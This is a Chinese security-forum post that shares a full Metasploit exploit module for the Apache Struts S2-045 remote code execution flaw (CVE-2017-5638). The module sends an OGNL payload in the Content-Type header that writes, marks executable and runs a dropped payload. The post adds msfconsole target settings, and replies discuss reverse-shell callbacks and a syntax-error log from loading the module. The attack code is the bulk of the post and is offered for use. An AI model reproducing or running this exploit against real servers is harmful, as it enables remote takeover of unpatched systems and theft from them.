    发表于 2017-5-13 14:57:23 135431
    本帖最后由 MAX丶 于 2017-5-13 06:58 编辑

    好长时间没有写文章了,再不写将要被坏蛋给干掉了,所以吓得我赶紧前来写写文章。本来我是想把MS17-010漏洞利用代码移植成Metasploit模块,可是我和小爱子研究了好长时间没有找到解决的办法,网上的一些资料也少之又少,哪里都很不好,所以等搞出来我再发吧。我先把EXP贴在下面吧
    ##
    # This module requires Metasploit: http://metasploit.com/download
    # Current source: https://github.com/rapid7/metasploit-framework
    ##
    
    require 'msf/core'
    
    # Metasploit module for the Apache Struts 2 Jakarta multipart parser flaw
    # (CVE-2017-5638 / S2-045, see the References entry below). The OGNL
    # expression is carried in the HTTP Content-Type request header
    # (see send_http_request).
    class MetasploitModule < Msf::Exploit::Remote
      Rank = ExcellentRanking

      include Msf::Exploit::Remote::HttpClient
      include Msf::Exploit::EXE

      # Registers module metadata (name, references, three targets with index 2
      # — 'Java Universal' — as the default) and the RPORT / TARGETURI / TMPPATH
      # datastore options.
      #
      # @param info [Hash] metadata overrides merged by update_info
      def initialize(info = {})
        super(update_info(info,
          'Name'           => 'Apache Struts Jakarta Multipart Parser Remote Code Execution',
          'Description'    => %q{
            This module exploits a remote code execution vunlerability in Apache Struts
            version 2.3.5 - 2.3.31,  and 2.5 - 2.5.10. Remote Code Execution can be performed
            via http Content-Type header.
          },
          'Author'         => [ 'Nixawk' ],
          'References'     => [
            ['CVE', '2017-5638'],
            ['URL', 'https://cwiki.apache.org/confluence/display/WW/S2-045']
          ],
          'Platform'       => %w{ java linux win },
          'Privileged'     => true,
          'Targets'        =>
            [
              ['Windows Universal',
                {
                  'Arch' => ARCH_X86,
                  'Platform' => 'win'
                }
              ],
              ['Linux Universal',
                {
                  'Arch' => ARCH_X86,
                  'Platform' => 'linux'
                }
              ],
              [ 'Java Universal',
                {
                  'Arch' => ARCH_JAVA,
                  'Platform' => 'java'
                },
              ]
            ],
          'DisclosureDate' => 'Mar 07 2017',
          'DefaultTarget' => 2))

          # TARGETURI is required; TMPPATH is optional and, when unset, the
          # per-platform fallbacks in #exploit are used.
          register_options(
            [
              Opt::RPORT(8080),
              OptString.new('TARGETURI', [ true, 'The path to a struts application action', '/struts2-showcase/' ]),
              OptString.new('TMPPATH', [ false, 'Overwrite the temp path for the file upload. Needed if the home directory is not writable.', nil])
            ]
          )
      end

      # Prefixes every status line with the HttpClient `peer` helper's value.
      #
      # @param msg [String] message to print
      def print_status(msg='')
        super("#{peer} - #{msg}")
      end

      # @return the first platform object of the currently selected target
      def get_target_platform
        target.platform.platforms.first
      end

      # Memoised (in @TMPPATH) copy of the TMPPATH option, terminated with '/'.
      # Returns nil when TMPPATH is not set.
      #
      # NOTE(review): `slash` is assigned inside the case statement but never
      # read, so '/' is appended regardless of platform. The bare `when` on its
      # own line appears to be parsed as `when (slash = '/')`, i.e. an
      # assignment used as the match value with an empty body — confirm.
      # Also `path << '/'` mutates the string in place; if datastore returns
      # the same object each time this rewrites the stored option — verify.
      def temp_path
        @TMPPATH ||= lambda {
          path = datastore['TMPPATH']
          return nil unless path

          case get_target_platform
          when Msf::Module::Platform::Windows
            slash = '\\'
          when
            slash = '/'
          else
          end

          unless path.end_with?('/')
            path << '/'
          end
          return path
        }.call
      end

      # Sends a single HTTP/1.1 GET to TARGETURI with +payload+ as the value of
      # the Content-Type header. Aborts the module with Failure::BadConfig when
      # the server answers 404.
      #
      # NOTE(review): the header key is a Symbol (`'Content-Type':`) whereas
      # every other hash in this file uses String keys — confirm the HTTP
      # client accepts a symbol header name.
      #
      # @param payload [String] value placed in the Content-Type header
      # @return the object returned by send_request_cgi, or nil if there was none
      def send_http_request(payload)
        uri = normalize_uri(datastore["TARGETURI"])
        resp = send_request_cgi(
          'uri'     => uri,
          'version' => '1.1',
          'method'  => 'GET',
          'headers' => {
            'Content-Type': payload
          }
        )

        if resp && resp.code == 404
          fail_with(Failure::BadConfig, 'Server returned HTTP 404, please double check TARGETURI')
        end
        resp
      end

      # Builds the OGNL expression that writes +content+ (hex string) to a file,
      # sets its executable bit and runs +cmd+ (base64-encoded here), then hands
      # it to send_http_request.
      #
      # @param cmd [String] command to execute on the target
      # @param filename [String] intended destination path.
      #   NOTE(review): never referenced in this body — the '#(unknown)'
      #   literals below look like an artefact of how the listing was pasted,
      #   so the file path is effectively a fixed string here.
      # @param content [String] hex-encoded file bytes (see #exploit)
      # @return the response from send_http_request
      def upload_exec(cmd, filename, content)
        var_a = rand_text_alpha_lower(4)
        var_b = rand_text_alpha_lower(4)
        var_c = rand_text_alpha_lower(4)

        cmd = Rex::Text.encode_base64(cmd)

        payload = "%{"
        payload << "(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)."

        # save into a file / set file execution bit
        payload << "(##{var_a}=new sun.misc.BASE64Decoder())."
        payload << "(##{var_b}=new java.io.FileOutputStream('#(unknown)'))."
        payload << "(##{var_b}.write(new java.math.BigInteger('#{content}', 16).toByteArray()))."
        payload << "(##{var_b}.close())."
        payload << "(##{var_c}=new java.io.File(new java.lang.String('#(unknown)')))."
        payload << "(##{var_c}.setExecutable(true))."
        payload << "(@java.lang.Runtime@getRuntime().exec(new java.lang.String(##{var_a}.decodeBuffer('#{cmd}'))))"
        payload << "}.multipart/form-data"

        send_http_request(payload)
      end

      # Vulnerability check: asks the server to add a response header with a
      # random name/value and tests whether it comes back.
      #
      # @return [Exploit::CheckCode] Vulnerable when the header is reflected
      #   with HTTP 200; Unknown when send_http_request raised
      #   Msf::Exploit::Failed (e.g. the 404 fail_with); Safe otherwise
      def check
        var_a = rand_text_alpha_lower(4)
        var_b = rand_text_alpha_lower(4)

        payload = "%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse']"
        payload << ".addHeader('#{var_a}', '#{var_b}')"
        payload << "}.multipart/form-data"

        begin
          resp = send_http_request(payload)
        rescue Msf::Exploit::Failed
          return Exploit::CheckCode::Unknown
        end

        if resp && resp.code == 200 && resp.headers[var_a] == var_b
          Exploit::CheckCode::Vulnerable
        else
          Exploit::CheckCode::Safe
        end
      end

      # Generates the payload file for the selected target platform, hex-encodes
      # it and passes it to upload_exec together with the command that runs it.
      #
      # NOTE(review): the 'linux' branch reads datastore['TMPPATH'] directly
      # rather than calling temp_path, so unlike the 'win' branch it gets no
      # trailing-slash normalisation; the 'java' branch uses temp_path with no
      # fallback, so an unset TMPPATH yields a bare relative file name.
      def exploit
        payload_exe = rand_text_alphanumeric(4 + rand(4))
        case target['Platform']
          when 'java'
            payload_exe = "#{temp_path}#{payload_exe}.jar"
            pl_exe = payload.encoded_jar.pack
            command = "java -jar #{payload_exe}"
          when 'linux'
            path = datastore['TMPPATH'] || '/tmp/'
            pl_exe = generate_payload_exe
            payload_exe = "#{path}#{payload_exe}"
            command = "/bin/sh -c #{payload_exe}"
          when 'win'
            path = temp_path || '.\\'
            pl_exe = generate_payload_exe
            payload_exe = "#{path}#{payload_exe}.exe"

            # only this branch prints the path before the generic message below
            print_status(payload_exe)
            command = "cmd.exe /c #{payload_exe}"
          else
            fail_with(Failure::NoTarget, 'Unsupported target platform!')
        end

        # unpack('H*') yields a one-element array of hex; join turns it into a String
        pl_content = pl_exe.unpack('H*').join()

        print_status("Uploading exploit to #{payload_exe}, and executing it.")
        upload_exec(command, payload_exe, pl_content)
      end
    end


    你们可以复制下来放在MSF目录里面,我个人选择放在这里【/usr/share/metasploit-framework/modules/exploits/windows/smb/】 1.png


    我们打开MSF运行脚本就可以了。
    2.png


    3.png
    Set RHOST 目标站

    set RPORT 80

    Set TARGETURI /exam/examIndex!viewExamIndex.action

    Set LHOST 192.168.1.XXX




    4.png


    完美执行!!!
    发表于 2017-5-13 15:45:45
    感谢分享
    发表于 2017-5-13 17:13:30
    感谢分享
    发表于 2017-5-15 15:11:45
    感谢分享
    发表于 2017-5-15 15:13:32
    感谢分享
    发表于 2017-5-15 16:40:38
    发表于 2017-5-15 17:03:17
    你的内网IP怎么弹回来的?做了端口转发之类?
    发表于 2017-5-15 17:03:56
    同样的exp同样的链接并且没有修复,我用的外网vps没弹回来。
    发表于 2017-5-16 16:58:42
    感谢分享!
    发表于 2017-5-19 13:20:13
    search无法找到文件是怎么回事?
    发表于 2017-5-19 14:08:38

    文章奖励介绍及评分标准:http://bbs.ichunqiu.com/thread-7869-1-1.html,如有疑问请加QQ:286894635!
    技术描述太少。

    发表于 2017-5-19 18:00:56
    yijiyouyu 发表于 2017-5-19 05:20
    search无法找到文件是怎么回事?

    缓存没建立好。建议随便选一个msf原有的漏洞模块,set过后exploit运行,然后关闭就可以了。
    ms17010 where is it      
    发表于 2017-5-30 14:04:18
    这个脚本貌似有一大堆语法错误啊,msf加载不出来,报了一大堆错。
    [-] WARNING! The following modules could not be loaded!
    [-]         /usr/share/metasploit-framework/modules/exploits/windows/smb/st2_045.rb: SyntaxError /usr/share/metasploit-framework/modules/exploits/windows/smb/st2_045.rb:16: syntax error, unexpected tSTRING_BEG, expecting keyword_do or '{' or '('
          'Name'           => ...
                 ^
    /usr/share/metasploit-framework/modules/exploits/windows/smb/st2_045.rb:16: syntax error, unexpected tIDENTIFIER, expecting keyword_end
    ...�  'Name'           => 'Apache Struts Jakarta Mu...
    ...                               ^
    /usr/share/metasploit-framework/modules/exploits/windows/smb/st2_045.rb:16: syntax error, unexpected ',', expecting keyword_end
    ... Parser Remote Code Execution',
    ...                               ^
    /usr/share/metasploit-framework/modules/exploits/windows/smb/st2_045.rb:17: syntax error, unexpected tIDENTIFIER, expecting keyword_end
          'Description'    => %q{
                                   ^
    /usr/share/metasploit-framework/modules/exploits/windows/smb/st2_045.rb:21: syntax error, unexpected ',', expecting keyword_end
          },
                  ^
    /usr/share/metasploit-framework/modules/exploits/windows/smb/st2_045.rb:22: syntax error, unexpected tIDENTIFIER, expecting keyword_end
          'Author'         => [ 'Nixawk' ],
                                        ^
    /usr/share/metasploit-framework/modules/exploits/windows/smb/st2_045.rb:22: syntax error, unexpected ',', expecting keyword_end
          'Author'         => [ 'Nixawk' ],
                                                         ^
    /usr/share/metasploit-framework/modules/exploits/windows/smb/st2_045.rb:23: syntax error, unexpected tIDENTIFIER, expecting keyword_end
          'References'     => [
                                    ^
    /usr/share/metasploit-framework/modules/exploits/windows/smb/st2_045.rb:26: syntax error, unexpected tIDENTIFIER, expecting ']'
          ],
                ^
    /usr/share/metasploit-framework/modules/exploits/windows/smb/st2_045.rb:27: syntax error, unexpected tIDENTIFIER, expecting keyword_end
          'Platform'       => %w{ java linux win },
                                      ^
    /usr/share/metasploit-framework/modules/exploits/windows/smb/st2_045.rb:27: syntax error, unexpected ',', expecting keyword_end
          'Platform'       => %w{ java linux win },
                                                               ^
    /usr/share/metasploit-framework/modules/exploits/windows/smb/st2_045.rb:28: syntax error, unexpected tIDENTIFIER, expecting keyword_end
          'Privileged'     => true,
                                    ^
    /usr/share/metasploit-framework/modules/exploits/windows/smb/st2_045.rb:28: Can't assign to true
          'Privileged'     => true,
                                             ^
    /usr/share/metasploit-framework/modules/exploits/windows/smb/st2_045.rb:29: syntax error, unexpected tSTRING_BEG, expecting keyword_do or '{' or '('
          'Targets'        =>
                 ^
    /usr/share/metasploit-framework/modules/exploits/windows/smb/st2_045.rb:29: syntax error, unexpected tIDENTIFIER, expecting keyword_end
          'Targets'        =>
                                       ^
    /usr/share/metasploit-framework/modules/exploits/windows/smb/st2_045.rb:34: syntax error, unexpected tSTRING_BEG, expecting keyword_do or '{' or '('
                  'Platform' => 'win'
                                 ^
    /usr/share/metasploit-framework/modules/exploits/windows/smb/st2_045.rb:34: syntax error, unexpected =>, expecting '}'
                  'Platform' => 'win'
                                             ^
    /usr/share/metasploit-framework/modules/exploits/windows/smb/st2_045.rb:36: syntax error, unexpected tIDENTIFIER, expecting ']'
              ],
                        ^
    /usr/share/metasploit-framework/modules/exploits/windows/smb/st2_045.rb:40: syntax error, unexpected tSTRING_BEG, expecting keyword_do or '{' or '('
                  'Platform' => 'linux'
                                 ^
    /usr/share/metasploit-framework/modules/exploits/windows/smb/st2_045.rb:40: syntax error, unexpected =>, expecting '}'
                  'Platform' => 'linux'
                                             ^
    /usr/share/metasploit-framework/modules/exploits/windows/smb/st2_045.rb:42: syntax error, unexpected tIDENTIFIER, expecting ']'
              ],
                        ^
    /usr/share/metasploit-framework/modules/exploits/windows/smb/st2_045.rb:46: syntax error, unexpected tSTRING_BEG, expecting keyword_do or '{' or '('
                  'Platform' => 'java'
                                 ^
    /usr/share/metasploit-framework/modules/exploits/windows/smb/st2_045.rb:46: syntax error, unexpected =>, expecting '}'
                  'Platform' => 'java'
                                             ^
    /usr/share/metasploit-framework/modules/exploits/windows/smb/st2_045.rb:49: syntax error, unexpected ']', expecting keyword_end
            ],
                     ^
    /usr/share/metasploit-framework/modules/exploits/windows/smb/st2_045.rb:51: syntax error, unexpected tSTRING_BEG, expecting keyword_do or '{' or '('
          'DefaultTarget' => 2))
                 ^
    /usr/share/metasploit-framework/modules/exploits/windows/smb/st2_045.rb:51: syntax error, unexpected =>, expecting keyword_end
          'DefaultTarget' => 2))
                                  ^
    /usr/share/metasploit-framework/modules/exploits/windows/smb/st2_045.rb:58: syntax error, unexpected tIDENTIFIER, expecting ']'
            ]
                    ^
    /usr/share/metasploit-framework/modules/exploits/windows/smb/st2_045.rb:93: syntax error, unexpected tIDENTIFIER, expecting ')'
          'uri'     => uri,
                             ^
    /usr/share/metasploit-framework/modules/exploits/windows/smb/st2_045.rb:94: syntax error, unexpected tSTRING_BEG, expecting keyword_do or '{' or '('
          'version' => '1.1',
                 ^
    /usr/share/metasploit-framework/modules/exploits/windows/smb/st2_045.rb:94: syntax error, unexpected =>, expecting keyword_end
          'version' => '1.1',
                            ^
    /usr/share/metasploit-framework/modules/exploits/windows/smb/st2_045.rb:94: syntax error, unexpected ',', expecting keyword_end
          'version' => '1.1',
                                   ^
    /usr/share/metasploit-framework/modules/exploits/windows/smb/st2_045.rb:95: syntax error, unexpected tIDENTIFIER, expecting keyword_end
          'method'  => 'GET',
                          ^
    /usr/share/metasploit-framework/modules/exploits/windows/smb/st2_045.rb:95: syntax error, unexpected ',', expecting keyword_end
          'method'  => 'GET',
                                    ^
    /usr/share/metasploit-framework/modules/exploits/windows/smb/st2_045.rb:97: syntax error, unexpected tSTRING_BEG, expecting keyword_do or '{' or '('
            'Content-Type': payload
                     ^
    /usr/share/metasploit-framework/modules/exploits/windows/smb/st2_045.rb:98: syntax error, unexpected '}', expecting keyword_end
          }